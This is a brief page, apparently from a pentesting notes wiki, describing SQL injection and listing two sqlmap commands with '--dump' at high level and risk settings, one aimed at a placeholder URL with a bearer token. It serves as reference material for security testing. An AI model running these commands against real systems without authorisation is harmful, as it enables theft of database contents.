search

SQLi

hashtag
Description

With this vulnerablilty, a hacker could steal sensitive data out of our databases. The issue is usually devs who don't know how to use prepared statements in their backend and use dynamic queries. Dynamic queries can be manipulated in such a way that a hacker appends his own query at the end of the query provided by the application.

hashtag
Payloads

sqlmap -r sqli.txt --level=5 --risk=3 --dump

sqlmap -u "https://fakeurl/profile/admin"
-H "Authorization: Bearer <TOKEN>" --level 3 --risk 2 --dump
PreviousTanukiNextOttergram

Last updated